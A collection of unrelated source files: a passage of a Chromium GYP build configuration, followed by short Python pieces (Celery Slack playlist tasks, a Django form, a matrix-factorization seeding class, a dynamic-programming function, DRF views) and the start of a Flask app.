'service/service_utility_process_host.h',
'service/cloud_print/cloud_print_consts.cc',
'service/cloud_print/cloud_print_consts.h',
'service/cloud_print/cloud_print_helpers.cc',
'service/cloud_print/cloud_print_helpers.h',
'service/cloud_print/cloud_print_proxy.cc',
'service/cloud_print/cloud_print_proxy.h',
'service/cloud_print/cloud_print_proxy_backend.cc',
'service/cloud_print/cloud_print_proxy_backend.h',
'service/cloud_print/cloud_print_url_fetcher.cc',
'service/cloud_print/cloud_print_url_fetcher.h',
'service/cloud_print/job_status_updater.cc',
'service/cloud_print/job_status_updater.h',
'service/cloud_print/print_system_dummy.cc',
'service/cloud_print/print_system.cc',
'service/cloud_print/print_system.h',
'service/cloud_print/printer_job_handler.cc',
'service/cloud_print/printer_job_handler.h',
'service/gaia/service_gaia_authenticator.cc',
'service/gaia/service_gaia_authenticator.h',
'service/net/service_url_request_context.cc',
'service/net/service_url_request_context.h',
'service/remoting/chromoting_host_manager.cc',
'service/remoting/chromoting_host_manager.h',
],
'include_dirs': [
'..',
],
'conditions': [
['OS=="win"', {
'defines': [
            # CP_PRINT_SYSTEM_AVAILABLE disables default dummy implementation
            # of cloud print system, and allows the use of a custom implementation.
'CP_PRINT_SYSTEM_AVAILABLE',
],
'sources': [
'service/cloud_print/print_system_win.cc',
],
}],
['OS=="linux"', {
'dependencies': [
'../build/linux/system.gyp:gtk',
],
}],
['use_cups==1', {
'defines': [
            # CP_PRINT_SYSTEM_AVAILABLE disables default dummy implementation
            # of cloud print system, and allows the use of a custom implementation.
'CP_PRINT_SYSTEM_AVAILABLE',
],
'sources': [
'service/cloud_print/print_system_cups.cc',
],
'conditions': [
['OS=="mac"', {
'link_settings': {
'libraries': [
'$(SDKROOT)/usr/lib/libcups.dylib',
]
},
}, {
'link_settings': {
'libraries': [
'-lcups',
'-lgcrypt',
],
},
}],
],
}],
['remoting==1', {
'dependencies': [
'../remoting/remoting.gyp:chromoting_host',
],
}],
['remoting==0', {
'sources!': [
'service/remoting/chromoting_host_manager.cc',
'service/remoting/chromoting_host_manager.h',
],
}],
],
},
{
'target_name': 'ipclist',
'type': 'executable',
'dependencies': [
'chrome',
'chrome_resources',
'chrome_strings',
'test_support_common',
'test_support_ui',
'../skia/skia.gyp:skia',
'../testing/gtest.gyp:gtest',
'../third_party/libxslt/libxslt.gyp:libxslt',
'../third_party/npapi/npapi.gyp:npapi',
],
'include_dirs': [
'..',
],
'sources': [
'tools/ipclist/all_messages.h',
'tools/ipclist/ipclist.cc',
],
},
],
'conditions': [
['OS=="mac"',
{ 'targets': [
{
'target_name': 'helper_app',
'type': 'executable',
'product_name': '<(mac_product_name) Helper',
'mac_bundle': 1,
'dependencies': [
'chrome_dll',
'interpose_dependency_shim',
'infoplist_strings_tool',
],
'sources': [
# chrome_exe_main_mac.mm's main() is the entry point for
# the "chrome" (browser app) target. All it does is jump
# to chrome_dll's ChromeMain. This is appropriate for
# helper processes too, because the logic to discriminate
# between process types at run time is actually directed
# by the --type command line argument processed by
# ChromeMain. Sharing chrome_exe_main_mac.mm with the
# browser app will suffice for now.
'app/chrome_exe_main_mac.mm',
'app/helper-Info.plist',
],
# TODO(mark): Come up with a fancier way to do this. It should only
# be necessary to list helper-Info.plist once, not the three times it
# is listed here.
'mac_bundle_resources!': [
'app/helper-Info.plist',
],
# TODO(mark): For now, don't put any resources into this app. Its
# resources directory will be a symbolic link to the browser app's
# resources directory.
'mac_bundle_resources/': [
['exclude', '.*'],
],
'xcode_settings': {
'CHROMIUM_BUNDLE_ID': '<(mac_bundle_id)',
'CHROMIUM_SHORT_NAME': '<(branding)',
'CHROMIUM_STRIP_SAVE_FILE': 'app/app.saves',
'INFOPLIST_FILE': 'app/helper-Info.plist',
},
'copies': [
{
'destination': '<(PRODUCT_DIR)/<(mac_product_name) Helper.app/Contents/MacOS',
'files': [
'<(PRODUCT_DIR)/libplugin_carbon_interpose.dylib',
],
},
],
'actions': [
{
# Generate the InfoPlist.strings file
'action_name': 'Generate InfoPlist.strings files',
'variables': {
'tool_path': '<(PRODUCT_DIR)/infoplist_strings_tool',
# Unique dir to write to so the [lang].lproj/InfoPlist.strings
# for the main app and the helper app don't name collide.
'output_path': '<(INTERMEDIATE_DIR)/helper_infoplist_strings',
},
'conditions': [
[ 'branding == "Chrome"', {
'variables': {
'branding_name': 'google_chrome_strings',
},
}, { # else branding!="Chrome"
'variables': {
'branding_name': 'chromium_strings',
},
}],
],
'inputs': [
'<(tool_path)',
'<(version_path)',
# TODO: remove this helper when we have loops in GYP
'>!@(<(apply_locales_cmd) \'<(grit_out_dir)/<(branding_name)_ZZLOCALE.pak\' <(locales))',
],
'outputs': [
# TODO: remove this helper when we have loops in GYP
'>!@(<(apply_locales_cmd) -d \'<(output_path)/ZZLOCALE.lproj/InfoPlist.strings\' <(locales))',
],
'action': [
'<(tool_path)',
'-b', '<(branding_name)',
'-v', '<(version_path)',
'-g', '<(grit_out_dir)',
'-o', '<(output_path)',
'-t', 'helper',
'<@(locales)',
],
'message': 'Generating the language InfoPlist.strings files',
'process_outputs_as_mac_bundle_resources': 1,
},
],
'postbuilds': [
{
# The framework (chrome_dll) defines its load-time path
# (DYLIB_INSTALL_NAME_BASE) relative to the main executable
# (chrome). A different relative path needs to be used in
# helper_app.
'postbuild_name': 'Fix Framework Link',
'action': [
'install_name_tool',
'-change',
'@executable_path/../Versions/<(version_full)/<(mac_product_name) Framework.framework/<(mac_product_name) Framework',
'@executable_path/../../../<(mac_product_name) Framework.framework/<(mac_product_name) Framework',
'${BUILT_PRODUCTS_DIR}/${EXECUTABLE_PATH}'
],
},
{
# Modify the Info.plist as needed. The script explains why this
# is needed. This is also done in the chrome and chrome_dll
# targets. In this case, -b0, -k0, and -s0 are used because
            # Breakpad, Keystone, and Subversion keys are never placed into
# the helper.
'postbuild_name': 'Tweak Info.plist',
'action': ['<(tweak_info_plist_path)',
'-b0',
'-k0',
'-s0',
'<(branding)',
'<(mac_bundle_id)'],
},
],
'conditions': [
['mac_breakpad==1', {
'variables': {
# A real .dSYM is needed for dump_syms to operate on.
'mac_real_dsym': 1,
},
}],
],
}, # target helper_app
{
# This produces the app mode loader, but not as a bundle. Chromium
# itself is responsible for producing bundles.
'target_name': 'app_mode_app',
'type': 'executable',
'product_name': '<(mac_product_name) App Mode Loader',
'sources': [
'app/app_mode_loader_mac.mm',
'common/app_mode_common_mac.h',
'common/app_mode_common_mac.mm',
],
'include_dirs': [
'..',
],
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/CoreFoundation.framework',
'$(SDKROOT)/System/Library/Frameworks/Foundation.framework',
],
},
}, # target app_mode_app
{
# Convenience target to build a disk image.
'target_name': 'build_app_dmg',
# Don't place this in the 'all' list; most won't want it.
# In GYP, booleans are 0/1, not True/False.
'suppress_wildcard': 1,
'type': 'none',
'dependencies': [
'chrome',
],
'variables': {
'build_app_dmg_script_path': 'tools/build/mac/build_app_dmg',
},
'actions': [
{
'inputs': [
'<(build_app_dmg_script_path)',
'<(PRODUCT_DIR)/<(branding).app',
],
'outputs': [
'<(PRODUCT_DIR)/<(branding).dmg',
],
'action_name': 'build_app_dmg',
'action': ['<(build_app_dmg_script_path)', '<@(branding)'],
},
], # 'actions'
},
{
# Dummy target to allow chrome to require plugin_carbon_interpose to
# build without actually linking to the resulting library.
'target_name': 'interpose_dependency_shim',
'type': 'executable',
'dependencies': [
'plugin_carbon_interpose',
],
# In release, we end up with a strip step that is unhappy if there is
# no binary. Rather than check in a new file for this temporary hack,
# just generate a source file on the fly.
'actions': [
{
'action_name': 'generate_stub_main',
'process_outputs_as_sources': 1,
'inputs': [],
'outputs': [ '<(INTERMEDIATE_DIR)/dummy_main.c' ],
'action': [
'bash', '-c',
'echo "int main() { return 0; }" > <(INTERMEDIATE_DIR)/dummy_main.c'
],
},
],
},
{
# dylib for interposing Carbon calls in the plugin process.
'target_name': 'plugin_carbon_interpose',
'type': 'shared_library',
'dependencies': [
'chrome_dll',
],
'sources': [
'browser/plugin_carbon_interpose_mac.cc',
],
'include_dirs': [
'..',
],
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/Carbon.framework',
],
},
'xcode_settings': {
'DYLIB_COMPATIBILITY_VERSION': '<(version_mac_dylib)',
'DYLIB_CURRENT_VERSION': '<(version_mac_dylib)',
'DYLIB_INSTALL_NAME_BASE': '@executable_path',
},
'postbuilds': [
{
# The framework (chrome_dll) defines its load-time path
# (DYLIB_INSTALL_NAME_BASE) relative to the main executable
# (chrome). A different relative path needs to be used in
# plugin_carbon_interpose, which runs in the helper_app.
'postbuild_name': 'Fix Framework Link',
'action': [
'install_name_tool',
'-change',
'@executable_path/../Versions/<(version_full)/<(mac_product_name) Framework.framework/<(mac_product_name) Framework',
'@executable_path/../../../<(mac_product_name) Framework.framework/<(mac_product_name) Framework',
'${BUILT_PRODUCTS_DIR}/${EXECUTABLE_PATH}'
],
},
],
},
{
'target_name': 'infoplist_strings_tool',
'type': 'executable',
'dependencies': [
'chrome_strings',
'../base/base.gyp:base',
'../app/app.gyp:app_base',
],
'include_dirs': [
'<(grit_out_dir)',
],
'sources': [
'tools/mac_helpers/infoplist_strings_util.mm',
],
},
], # targets
}, { # else: OS != "mac"
'targets': [
{
'target_name': 'convert_dict',
'type': 'executable',
'msvs_guid': '42ECD5EC-722F-41DE-B6B8-83764C8016DF',
'dependencies': [
'../base/base.gyp:base',
'../base/base.gyp:base_i18n',
'convert_dict_lib',
'../third_party/hunspell/hunspell.gyp:hunspell',
],
'sources': [
'tools/convert_dict/convert_dict.cc',
],
},
{
'target_name': 'convert_dict_lib',
'product_name': 'convert_dict',
'type': 'static_library',
'msvs_guid': '1F669F6B-3F4A-4308-E496-EE480BDF0B89',
'include_dirs': [
'..',
],
'sources': [
'tools/convert_dict/aff_reader.cc',
'tools/convert_dict/aff_reader.h',
'tools/convert_dict/dic_reader.cc',
'tools/convert_dict/dic_reader.h',
'tools/convert_dict/hunspell_reader.cc',
'tools/convert_dict/hunspell_reader.h',
],
},
{
'target_name': 'flush_cache',
'type': 'executable',
'msvs_guid': '4539AFB3-B8DC-47F3-A491-6DAC8FD26657',
'dependencies': [
'../base/base.gyp:base',
'../base/base.gyp:test_support_base',
],
'sources': [
'tools/perf/flush_cache/flush_cache.cc',
],
},
{
# Mac needs 'process_outputs_as_mac_bundle_resources' to be set,
# and the option is only effective when the target type is native
# binary. Hence we cannot build the Mac bundle resources here and
# the action is duplicated in chrome_dll.gypi.
'target_name': 'packed_extra_resources',
'type': 'none',
'variables': {
'repack_path': '../tools/data_pack/repack.py',
},
'dependencies': [
'chrome_extra_resources',
],
'actions': [
{
'action_name': 'repack_resources',
'variables': {
'pak_inputs': [
'<(grit_out_dir)/component_extension_resources.pak',
'<(grit_out_dir)/devtools_resources.pak',
'<(grit_out_dir)/net_internals_resources.pak',
'<(grit_out_dir)/shared_resources.pak',
'<(grit_out_dir)/sync_internals_resources.pak',
],
},
'inputs': [
'<(repack_path)',
'<@(pak_inputs)',
],
'outputs': [
'<(PRODUCT_DIR)/resources.pak',
],
'action': ['python', '<(repack_path)', '<@(_outputs)',
'<@(pak_inputs)'],
},
]
}
],
},], # OS!="mac"
['OS=="linux"',
{ 'targets': [
{
'target_name': 'linux_symbols',
'type': 'none',
'conditions': [
['linux_dump_symbols==1', {
'actions': [
{
'action_name': 'dump_symbols',
'inputs': [
'<(DEPTH)/build/linux/dump_app_syms',
'<(PRODUCT_DIR)/dump_syms',
'<(PRODUCT_DIR)/chrome',
],
'outputs': [
'<(PRODUCT_DIR)/chrome.breakpad.<(target_arch)',
],
'action': ['<(DEPTH)/build/linux/dump_app_syms',
'<(PRODUCT_DIR)/dump_syms',
'<(linux_strip_binary)',
'<(PRODUCT_DIR)/chrome',
'<@(_outputs)'],
'message': 'Dumping breakpad symbols to <(_outputs)',
'process_outputs_as_sources': 1,
},
],
'dependencies': [
'chrome',
'../breakpad/breakpad.gyp:dump_syms',
],
}],
['linux_strip_reliability_tests==1', {
'actions': [
{
'action_name': 'strip_reliability_tests',
'inputs': [
'<(PRODUCT_DIR)/automated_ui_tests',
'<(PRODUCT_DIR)/reliability_tests',
'<(PRODUCT_DIR)/lib.target/_pyautolib.so',
],
'outputs': [
'<(PRODUCT_DIR)/strip_reliability_tests.stamp',
],
'action': ['strip',
'-g',
'<@(_inputs)'],
'message': 'Stripping reliability tests',
},
],
'dependencies': [
'automated_ui_tests',
'reliability_tests',
],
}],
],
}
],
},], # OS=="linux"
['OS=="win"',
{ 'targets': [
{
# TODO(sgk): remove this when we change the buildbots to
# use the generated build\all.sln file to build the world.
'target_name': 'pull_in_all',
'type': 'none',
'dependencies': [
'installer/mini_installer.gyp:*',
'installer/installer_tools.gyp:*',
'installer/upgrade_test.gyp:*',
'../app/app.gyp:*',
'../base/base.gyp:*',
'../chrome_frame/chrome_frame.gyp:*',
'../content/content.gyp:*',
'../ipc/ipc.gyp:*',
'../media/media.gyp:*',
'../net/net.gyp:*',
'../ppapi/ppapi.gyp:*',
'../printing/printing.gyp:*',
'../sdch/sdch.gyp:*',
'../skia/skia.gyp:*',
'../testing/gmock.gyp:*',
'../testing/gtest.gyp:*',
'../third_party/bsdiff/bsdiff.gyp:*',
'../third_party/bspatch/bspatch.gyp:*',
'../third_party/bzip2/bzip2.gyp:*',
'../third_party/codesighs/codesighs.gyp:*',
'../third_party/iccjpeg/iccjpeg.gyp:*',
'../third_party/icu/icu.gyp:*',
'../third_party/libpng/libpng.gyp:*',
'../third_party/libwebp/libwebp.gyp:*',
'../third_party/libxslt/libxslt.gyp:*',
'../third_party/lzma_sdk/lzma_sdk.gyp:*',
'../third_party/modp_b64/modp_b64.gyp:*',
'../third_party/npapi/npapi.gyp:*',
'../third_party/qcms/qcms.gyp:*',
'../third_party/sqlite/sqlite.gyp:*',
'../third_party/zlib/zlib.gyp:*',
'../ui/ui.gyp:*',
'../webkit/support/webkit_support.gyp:*',
'../webkit/webkit.gyp:*',
'../build/temp_gyp/googleurl.gyp:*',
'../breakpad/breakpad.gyp:*',
'../courgette/courgette.gyp:*',
'../rlz/rlz.gyp:*',
'../sandbox/sandbox.gyp:*',
'../tools/memory_watcher/memory_watcher.gyp:*',
'../v8/tools/gyp/v8.gyp:v8_shell',
'<(libjpeg_gyp_path):*',
],
'conditions': [
['win_use_allocator_shim==1', {
'dependencies': [
'../base/allocator/allocator.gyp:*',
],
}],
],
},
{
'target_name': 'chrome_dll_version',
'type': 'none',
#'msvs_guid': '414D4D24-5D65-498B-A33F-3A29AD3CDEDC',
'dependencies': [
'../build/util/build_util.gyp:lastchange',
],
'direct_dependent_settings': {
'include_dirs': [
'<(SHARED_INTERMEDIATE_DIR)/chrome_dll_version',
],
},
'actions': [
{
'action_name': 'version',
'variables': {
'lastchange_path':
'<(SHARED_INTERMEDIATE_DIR)/build/LASTCHANGE',
'template_input_path': 'app/chrome_dll_version.rc.version',
},
'conditions': [
[ 'branding == "Chrome"', {
'variables': {
'branding_path': 'app/theme/google_chrome/BRANDING',
},
}, { # else branding!="Chrome"
'variables': {
'branding_path': 'app/theme/chromium/BRANDING',
},
}],
],
'inputs': [
'<(template_input_path)',
'<(version_path)',
'<(branding_path)',
'<(lastchange_path)',
],
'outputs': [
'<(SHARED_INTERMEDIATE_DIR)/chrome_dll_version/chrome_dll_version.rc',
],
'action': [
'python',
'<(version_py_path)',
'-f', '<(version_path)',
'-f', '<(branding_path)',
'-f', '<(lastchange_path)',
'<(template_input_path)',
'<@(_outputs)',
],
'message': 'Generating version information in <(_outputs)'
},
],
},
{
'target_name': 'chrome_version_header',
'type': 'none',
'hard_dependency': 1,
'dependencies': [
'../build/util/build_util.gyp:lastchange',
],
'actions': [
{
'action_name': 'version_header',
'variables': {
'lastchange_path':
'<(SHARED_INTERMEDIATE_DIR)/build/LASTCHANGE',
},
'conditions': [
[ 'branding == "Chrome"', {
'variables': {
'branding_path': 'app/theme/google_chrome/BRANDING',
},
}, { # else branding!="Chrome"
'variables': {
'branding_path': 'app/theme/chromium/BRANDING',
},
}],
],
'inputs': [
'<(version_path)',
'<(branding_path)',
'<(lastchange_path)',
'version.h.in',
],
'outputs': [
'<(SHARED_INTERMEDIATE_DIR)/version.h',
],
'action': [
'python',
'<(version_py_path)',
'-f', '<(version_path)',
'-f', '<(branding_path)',
'-f', '<(lastchange_path)',
'version.h.in',
'<@(_outputs)',
],
'message': 'Generating version header file: <@(_outputs)',
},
],
},
{
'target_name': 'automation',
'type': '<(library)',
'msvs_guid': '1556EF78-C7E6-43C8-951F-F6B43AC0DD12',
'dependencies': [
'theme_resources',
'../base/base.gyp:test_support_base',
'../skia/skia.gyp:skia',
'../testing/gtest.gyp:gtest',
],
'include_dirs': [
'..',
],
'sources': [
'test/automation/autocomplete_edit_proxy.cc',
'test/automation/autocomplete_edit_proxy.h',
'test/automation/automation_handle_tracker.cc',
'test/automation/automation_handle_tracker.h',
'test/automation/automation_json_requests.cc',
'test/automation/automation_json_requests.h',
'test/automation/automation_proxy.cc',
'test/automation/automation_proxy.h',
'test/automation/browser_proxy.cc',
'test/automation/browser_proxy.h',
'test/automation/dom_element_proxy.cc',
'test/automation/dom_element_proxy.h',
'test/automation/extension_proxy.cc',
'test/automation/extension_proxy.h',
'test/automation/javascript_execution_controller.cc',
'test/automation/javascript_execution_controller.h',
'test/automation/tab_proxy.cc',
'test/automation/tab_proxy.h',
'test/automation/window_proxy.cc',
'test/automation/window_proxy.h',
],
},
{
'target_name': 'crash_service',
'type': 'executable',
'msvs_guid': '89C1C190-A5D1-4EC4-BD6A-67FF2195C7CC',
'dependencies': [
'app/policy/cloud_policy_codegen.gyp:policy',
'common_constants',
'installer_util',
'../base/base.gyp:base',
'../breakpad/breakpad.gyp:breakpad_handler',
'../breakpad/breakpad.gyp:breakpad_sender',
],
'include_dirs': [
'..',
],
'sources': [
'tools/crash_service/crash_service.cc',
'tools/crash_service/crash_service.h',
'tools/crash_service/main.cc',
],
'msvs_settings': {
'VCLinkerTool': {
'SubSystem': '2', # Set /SUBSYSTEM:WINDOWS
},
},
},
]}, # 'targets'
], # OS=="win"
['OS=="linux" or OS=="freebsd" or OS=="openbsd" or OS=="solaris"', {
'targets': [{
'target_name': 'packed_resources',
'type': 'none',
'variables': {
'repack_path': '../tools/data_pack/repack.py',
},
'actions': [
# TODO(mark): These actions are duplicated for the Mac in the
# chrome_dll target. Can they be unified?
#
# Mac needs 'process_outputs_as_mac_bundle_resources' to be set,
# and the option is only effective when the target type is native
# binary. Hence we cannot build the Mac bundle resources here.
{
'action_name': 'repack_chrome',
'variables': {
'pak_inputs': [
'<(grit_out_dir)/autofill_resources.pak',
'<(grit_out_dir)/browser_resources.pak',
'<(grit_out_dir)/common_resources.pak',
'<(grit_out_dir)/default_plugin_resources/default_plugin_resources.pak',
'<(grit_out_dir)/renderer_resources.pak',
'<(grit_out_dir)/theme_resources.pak',
'<(SHARED_INTERMEDIATE_DIR)/app/app_resources/app_resources.pak',
'<(SHARED_INTERMEDIATE_DIR)/ui/gfx/gfx_resources.pak',
'<(SHARED_INTERMEDIATE_DIR)/net/net_resources.pak',
'<(SHARED_INTERMEDIATE_DIR)/webkit/webkit_chromium_resources.pak',
'<(SHARED_INTERMEDIATE_DIR)/webkit/webkit_resources.pak',
],
},
'inputs': [
'<(repack_path)',
'<@(pak_inputs)',
],
'outputs': [
'<(INTERMEDIATE_DIR)/repack/chrome.pak',
],
'action': ['python', '<(repack_path)', '<@(_outputs)',
'<@(pak_inputs)'],
},
{
'action_name': 'repack_locales',
'variables': {
'conditions': [
['branding=="Chrome"', {
'branding_flag': ['-b', 'google_chrome',],
}, { # else: branding!="Chrome"
'branding_flag': ['-b', 'chromium',],
}],
],
},
'inputs': [
'tools/build/repack_locales.py',
# NOTE: Ideally the common command args would be shared amongst
# inputs/outputs/action, but the args include shell variables
# which need to be passed intact, and command expansion wants
# to expand the shell variables. Adding the explicit quoting
# here was the only way it seemed to work.
'>!@(<(repack_locales_cmd) -i <(branding_flag) -g \'<(grit_out_dir)\' -s \'<(SHARED_INTERMEDIATE_DIR)\' -x \'<(INTERMEDIATE_DIR)\' <(locales))',
],
'outputs': [
'>!@(<(repack_locales_cmd) -o -g \'<(grit_out_dir)\' -s \'<(SHARED_INTERMEDIATE_DIR)\' -x \'<(INTERMEDIATE_DIR)\' <(locales))',
],
'action': [
'<@(repack_locales_cmd)',
'<@(branding_flag)',
'-g', '<(grit_out_dir)',
'-s', '<(SHARED_INTERMEDIATE_DIR)',
'-x', '<(INTERMEDIATE_DIR)',
'<@(locales)',
],
},
],
# We'll install the resource files to the product directory.
'copies': [
{
'destination': '<(PRODUCT_DIR)/locales',
'files': [
'>!@(<(repack_locales_cmd) -o -g \'<(grit_out_dir)\' -s \'<(SHARED_INTERMEDIATE_DIR)\' -x \'<(INTERMEDIATE_DIR)\' <(locales))',
],
},
{
'destination': '<(PRODUCT_DIR)',
'files': [
'<(INTERMEDIATE_DIR)/repack/chrome.pak'
],
},
],
}], # targets
}], # OS=="linux" or OS=="freebsd" or OS=="openbsd" or OS=="solaris"
], # 'conditions'
}
# Local Variables:
# tab-width:2
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=2 shiftwidth=2:
|
# we are trying to get an input from the user - we need the number of month and it has to be an integer
def my_input(prompt=''):
    """Read a line of user input under both Python 2 and Python 3.

    Tries Python 2's raw_input() first (returns the raw string); on
    Python 3 that name does not exist, so the NameError falls back to
    input(). The original called input() in BOTH branches, defeating the
    compatibility shim and eval()-ing user input on Python 2.
    """
    try:
        return raw_input(prompt)
    except NameError:
        return input(prompt)
def time_frame():
    """Ask how many months to run the simulation and return it as an int.

    Re-prompts until an integer is entered; the original retried only once
    and crashed with ValueError on a second bad entry. Also fixes the
    "stimulation" typo in the retry prompt.
    """
    prompt = ("How long would you like to run the simulation for? "
              "Enter in number (1, 2,.. etc) of month: ")
    while True:
        try:
            return int(my_input(prompt))
        except ValueError:
            # People rarely do exactly as asked; explain and ask again.
            print("Please input month number as month digit (eg. 10)")
# months = time_frame()
|
import copy
import celery
from src.constants import Platform
from src.models import Playlist
from src.message_formatters import SlackMessageFormatter
from src.music_services import TrackInfo
from src.utils import (
add_track_to_playlists,
fuzzy_search_from_string,
fuzzy_search_from_track_info,
get_track_info_from_link
)
app = celery.Celery('tasks', broker="redis://redisbroker:6379/0")
@app.task
def search_and_add_to_playlists(origin, platform, channel):
    """
    1. Search for track info based on target
    2. add to same platform playlists

    ``origin`` is either a serialized TrackInfo dict (carries a
    'platform' key) or a plain {'track_name', 'artist'} dict.
    """
    platform = Platform.from_string(platform)
    playlists = Playlist.query.filter_by(channel_id=channel, platform=platform).all()
    if not playlists:
        return True

    # A TrackInfo serialized via __dict__ carries a 'platform' key;
    # rebuild the object before searching.
    if 'platform' in origin:
        origin = TrackInfo(**origin)

    if isinstance(origin, TrackInfo):
        track = fuzzy_search_from_track_info(track_info=origin)
    else:
        track = fuzzy_search_from_string(
            track_name=origin.get('track_name'),
            artist=origin.get('artist'),
            platform=platform
        )

    if not track:
        # Report the failed search back to the Slack channel.
        failure_msg = SlackMessageFormatter.format_failed_search_results_message(
            origin=origin,
            target_platform=platform
        )
        failure_msg.update({'channel': channel})
        SlackMessageFormatter.post_message(payload=failure_msg)
        return True

    successes, failures = add_track_to_playlists(
        track_info=track,
        playlists=playlists
    )

    # Send the per-playlist add results back to the channel.
    results_msg = SlackMessageFormatter.format_add_track_results_message(
        origin=origin,
        track_info=track,
        successes=successes,
        failures=failures
    )
    results_msg.update({'channel': channel})
    SlackMessageFormatter.post_message(payload=results_msg)
    return True
@app.task
def add_manual_track_to_playlists(track_name, artist, channel):
    """Fan a manually entered track out to both platforms' playlists."""
    origin = {'track_name': track_name, 'artist': artist}
    # Schedule one async search-and-add per platform (YouTube first,
    # then Spotify, matching the original call order).
    for target in (Platform.YOUTUBE, Platform.SPOTIFY):
        search_and_add_to_playlists.delay(
            origin=origin,
            platform=target.name,
            channel=channel
        )
    return True
@app.task
def add_link_to_playlists(link, channel):
    """
    Takes a shared link and:
    1. Gets the TrackInfo from the platform the link was shared from
    2. Schedules an attempt to add TrackInfo to the other platform's playlists
    3. Adds the track to all Playlists of the same platform
    """
    link_platform = Platform.from_link(link)

    # Get TrackInfo from the link's native platform.
    track_info = get_track_info_from_link(link=link)
    if not track_info:
        # There's something wrong with the link; report back to the channel.
        msg_payload = SlackMessageFormatter.format_failed_search_results_message(
            origin=link,
            target_platform=link_platform
        )
        msg_payload.update({'channel': channel})
        SlackMessageFormatter.post_message(payload=msg_payload)
        return True

    # celery needs json-able objects, so serialize the TrackInfo.
    track_info_json = copy.deepcopy(track_info.__dict__)
    track_info_json['platform'] = track_info.platform.name

    # Schedule the cross-platform add (YouTube <-> Spotify).
    search_and_add_to_playlists.delay(
        origin=track_info_json,
        platform=(
            Platform.SPOTIFY.name
            if link_platform is Platform.YOUTUBE
            else Platform.YOUTUBE.name
        ),
        channel=channel
    )

    playlists = Playlist.query.filter_by(channel_id=channel, platform=link_platform).all()
    if not playlists:
        return True

    # (The original re-checked `if playlists:` here; the early return
    # above already guarantees it is non-empty.)
    successes, failures = add_track_to_playlists(
        track_info=track_info,
        playlists=playlists
    )

    # Send the per-playlist add results back to the channel.
    payload = SlackMessageFormatter.format_add_track_results_message(
        origin=link,
        track_info=track_info,
        successes=successes,
        failures=failures
    )
    payload.update({'channel': channel})
    SlackMessageFormatter.post_message(payload=payload)
    return True
|
from django import forms
from django.db.models import fields
from .models import Participant
# model form
# class RegistrationForm(forms.ModelForm):
# class Meta:
# model=Participant
# fields=['email']
# form object
class RegistrationForm(forms.Form):
    """Plain (non-model) form collecting a participant's email address."""

    email = forms.EmailField(label='your email')
"""
###################################
Random (``methods.seeding.random``)
###################################
Random is the simplest MF initialization method.
The entries of factors are drawn from a uniform distribution over
[0, max(target matrix)). Generated matrix factors are sparse matrices with the
default density parameter of 0.7.
"""
from nimfa.utils.linalg import *
__all__ = ['Random']
class Random(object):

    """Random MF seeding: draw factor entries uniformly from [0, V.max())."""

    def __init__(self):
        # Name reported by __str__; identifies this seeding method.
        self.name = "random"

    def initialize(self, V, rank, options, random_state=None):
        """
        Return initialized basis and mixture matrix (and additional factors
        if specified via options ``Sn``, n = 1, 2, ..., k).

        Initialized matrices are of the same type as the passed target matrix.

        :param V: Target matrix, the matrix for the MF method to estimate.
        :type V: One of the :class:`scipy.sparse` sparse matrix types or
            :class:`numpy.matrix`
        :param rank: Factorization rank.
        :type rank: `int`
        :param options: Algorithm and model specific options. Option ``Sn``
            (n = 1, 2, ...) is a (dim1, dim2) tuple requesting an extra
            factor of that shape; extra factors are returned after W and H.
            Option ``density`` (default 0.7) is the density of generated
            matrices and applies only when ``V`` is a scipy.sparse matrix.
        :type options: `dict`
        :param random_state: Seed passed to np.random.RandomState().
            NOTE(review): only the dense path uses it; the sparse path
            relies on scipy's global RNG.
        :type random_state: `int`
        """
        self.rank = rank
        self.density = options.get('density', 0.7)
        if sp.isspmatrix(V):
            self.max = V.data.max()
            self._format = V.getformat()
            gen = self.gen_sparse
        else:
            self.max = V.max()
            self.prng = np.random.RandomState(random_state)
            gen = self.gen_dense
        self.W = gen(V.shape[0], self.rank)
        self.H = gen(self.rank, V.shape[1])
        mfs = [self.W, self.H]
        for sn in options:
            # Extra-factor options have the form 'S<number>'. The original
            # used "sn[0] is 'S'" -- string identity, which only works by
            # virtue of CPython interning; use equality instead.
            if sn[0] == 'S' and sn[1:].isdigit():
                mfs.append(gen(options[sn][0], options[sn][1]))
        return mfs

    def gen_sparse(self, dim1, dim2):
        """
        Return a randomly initialized sparse matrix of the given shape,
        scaled by the target matrix maximum.

        :param dim1: Dimension along first axis.
        :type dim1: `int`
        :param dim2: Dimension along second axis.
        :type dim2: `int`
        """
        rnd = sp.rand(dim1, dim2, density=self.density, format=self._format)
        return abs(self.max * rnd)

    def gen_dense(self, dim1, dim2):
        """
        Return a randomly initialized :class:`numpy.matrix` of the given
        shape with entries drawn uniformly from [0, self.max).

        :param dim1: Dimension along first axis.
        :type dim1: `int`
        :param dim2: Dimension along second axis.
        :type dim2: `int`
        """
        # np.asmatrix replaces the np.mat alias removed in NumPy 2.0;
        # behavior is identical.
        return np.asmatrix(self.prng.uniform(0, self.max, (dim1, dim2)))

    def __repr__(self):
        return "random.Random()"

    def __str__(self):
        return self.name
|
# O(n) time | O(1) space
def maxSubsetSumNoAdjacent(array):
    """Return the maximum sum of non-adjacent elements of `array`.

    Returns None for an empty array (preserving the original contract).
    Classic DP with two rolling values: the best sum ending at or before
    the previous element, and the one before that.
    """
    if not array:          # idiomatic emptiness check (was `not len(array)`)
        return None
    if len(array) == 1:
        return array[0]
    prev2 = array[0]                 # best sum using elements up to i-2
    prev1 = max(array[0], array[1])  # best sum using elements up to i-1
    for value in array[2:]:
        prev2, prev1 = prev1, max(prev1, prev2 + value)
    return prev1
# Demo: expected max non-adjacent sum is 75 + 120 + 135 = 330.
print(maxSubsetSumNoAdjacent([75, 105, 120, 75, 90, 135]))
from rest_framework.response import Response
from rest_framework.views import APIView
from store.api.serializers import ProductSerializer, CategorySerializer
from store.models import Product, Category
class ProductList(APIView):
def get_products(self):
return Product.objects.filter(in_stock=True)
def get(self, request):
products = self.get_products()
serializer = ProductSerializer(products, many=True)
return Response(serializer.data)
class CategoryList(APIView):
def getCategory(self):
return Category.objects.all()
def get(self, request):
categories = self.getCategory()
serializer = CategorySerializer(categories, many=True)
return Response(serializer.data)
|
"""
Title: Prosfora : Social Media for Artists
Author: Gagan Deep Singh, Mayank Setia, Ritik Bhatnagar
Languages: Python, HTML, CSS, JavaScript, jQuery
"""
from flask import (Flask, render_template,
